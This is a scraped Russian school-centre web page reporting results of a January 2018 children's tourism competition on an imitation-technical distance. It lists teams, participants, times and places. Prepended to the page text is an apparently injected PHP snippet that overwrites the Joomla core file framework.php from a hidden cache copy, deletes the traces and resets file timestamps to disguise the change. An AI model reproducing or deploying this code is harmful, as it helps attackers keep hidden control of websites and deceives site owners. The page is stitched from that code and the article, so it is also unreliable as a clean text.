$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Cоревнования на имитационно-технической дистанции
МАУДО "Дом детского творчества п. Новосергиевка" Новосергиевского района Оренбургской области

Регистрация Вход

Зарегистрируйтесь, чтобы оставлять комментарии в гостевой книге



Спасибо за регистрацию

Ссылки

План мероприятий

Февраль 2018
Пн Вт Ср Чт Пт Сб Вс
29 30 31 1 2 3 4
5 6 7 8 9 10 11
12 13 14 15 16 17 18
19 20 21 22 23 24 25
26 27 28 1 2 3 4
Developed by JoomVision.com
Баннер
  • Toggle
  • Закрыть

Cоревнования на имитационно-технической дистанции PDF Печать E-mail

      5 января 2018 года на базе МОБУ «Платовская СОШ им.А.Матросова» прошли соревнования на имитационно-технической дистанции 2,3 класса.

      В соревнованиях приняли участие 50 учащихся из МОБУ «Платовская СОШ им.А.Матросова» - руководитель Н.В.Смолина, МОАУ «Кулагинская СОШ»- М.В.Ручкин, МОБУ «Кувайская СОШ» - О.А. Новосельский, МОБУ «Краснополянская ООШ» - М.С.Жангуров.

 

Сводный ПРОТОКОЛ

лично-командные соревнования по пешеходному ТМ

 личных, командных, лично-командных  вид туризма

 на Имитационно-техническая дистанция 3 класса с элементами 4 класса

 наименование дистанции «личная»

Группа (возрастная, квалификационная)- смешанная Дата «5» января 2018г

Наименование соревнований ( слета) районные соревнования в закрытом помещении

 

п/п

Команда

Фамилия, имя участника

Штраф

1б(10с)

 

 

время

Место

1

МОБУ «Платовская СОШ им. А.Матросова»

Кубасов Влад

-

6.18

3

Агаршева Наталья

-

   5.58

       1

Хасанова Анастасия

-

   9.05

       2

3

МОАУ«Кулагинская СОШ»

Шипилов Сергей

-

4.13

1

Капишников Данил

-

   5.35

       2

 

 

Сводный ПРОТОКОЛ

лично-командные соревнования по пешеходному ТМ

 личных, командных, лично-командных  вид туризма

 на Имитационно-техническая дистанция 3 класса

 наименование дистанции «личная»

Группа (возрастная, квалификационная)- смешанная Дата «5» января 2018г

Наименование соревнований ( слета) районные соревнования в закрытом помещении

 

п/п

Команда

Фамилия, имя участника

Штраф

1б(10с)

 

 

время

Место

1

МОБУ «Платовская СОШ им. А.Матросова»

Уразаева Злата

-

5.14

2

Романцева Мария

-

   14.26

       4

Ергалиев Артур

-

   11.24

       2

3

МОАУ«Кулагинская СОШ»

Пятин Саша

-

2.31

1

Куликова Снежанна

 

6.49

3

Пятина Лена

-

   3.11

       1

 


Сводный ПРОТОКОЛ

лично-командные соревнования по пешеходному ТМ

 личных, командных, лично-командных  вид туризма

 на Имитационно-техническая дистанция 2 класса

 наименование дистанции «лично-командная»

Группа (возрастная, квалификационная)- смешанная Дата «5» января 2018г

Наименование соревнований ( слета) районные соревнования в закрытом помещении

 

п/п

Команда

Фамилия, имя участника

 

Штраф

1б(10с)

 

Место

Командное

   Время

Время

Место

1

МОБУ «Платовская СОШ им. А.Матросова»

(лично)

Уразаева Злата

-

4.30

1

 

 

Ергалиев Артур

2.40

9.20

13

Романцева Мария

0.60

8.27

14

2

МОАУ«Кулагинская СОШ-1»

Пятин Саша

-

3.25

I

22.44

4

Никитин Данил

1.20

7.07

12

Лупандина Катя

0.30

5.10

6

Добрынина Лиза

-

5.02

4

3

МОАУ«Кулагинская СОШ-2»

Пятина Дарья

-

4.44

III

25,31

5

Лупандина Валерия

-

5.03

5

Ткаченко Милена

-

5.57

9

Шипилов Ярослав

-

9.47

15

МОБУ «Кувайская СОШ-1»

 

Сайтаков Наиль

0.60

4.15

4

20.27 

 

II 

 

Майоров Денис

0.60

4.55

8

Назаров Кирилл

0.60

4.46

7

Шалимова Радмила

1.50

6.31

10

 

МОБУ «Кувайская СОШ-2»

 

 

Ахметов Руслан

0.10

3.45

II

20.28

   III

Бижанова Анжела

0.40

5.45

8

Куваншалиев Равиль

-

4.23

5

Михайлов Сергей

0.40

6.35

10

 

 

 МОБУ «Кувайская СОШ-3»

 

Игишев Эмир

0.60

4.29

6

25.44

     6

Иштуганов Айдар

2.30

9.25

14

Снегирева Ангелина

-

5.10

6

Кутшахметов Фаиль

1.40

6.40

11

 

 МОБУ «Кувайская СОШ-4»

 

Сайтаков Родион

0.30

5.00

9

32.25

     7

Назарова Ульяна

1.10

7.40

13

7

Коноплева Александра

0.50

9.15

17

 

Снегирева Валерия

0.60

10.30

19

8

МОБУ «Кувайская СОШ» (лично)

Иштуганова Эльвина

-

9.18

18

 

 

Ищенко Дарья

-

10.45

20

Бритикова Кристина

-

7.29

11

 

 

9

МОБУ«Краснополянская ООШ»

Семенов Ярослав

0.20

3.58

   III

18.29

     I

Кантемирова Лиза

-

4.22

II

Жаналин Арслан

-

4.55

8

 

 

Решетова Виолетта

0.60

5.14

7

 

МОБУ«Краснополянская ООШ»( лично)

Жармухамбетова Диана

0.30

8.42

16

 

 

Соломина Алена

0.10

8.33

15

 

 

 

 

 

 

 

МОБУ«Краснополянская ООШ» (вне конкурса)

Ахалмосулишвилли Валентина

-

3.50

 

 

 

Дзюба Александр

0.30

6.29

 

 

 

Бельков Валерий

0.40

6.30

 


 

Судья IIкат.   Смолина Н.В. /_____________________/

                                                                                         подпись                                       Ф,И

 

Судья IIкат.   Ручкин М.В. /_____________________/

                                                                                         подпись                                       Ф,И

 

 

comback_black_green_75

Обновлено 15.01.2018 12:50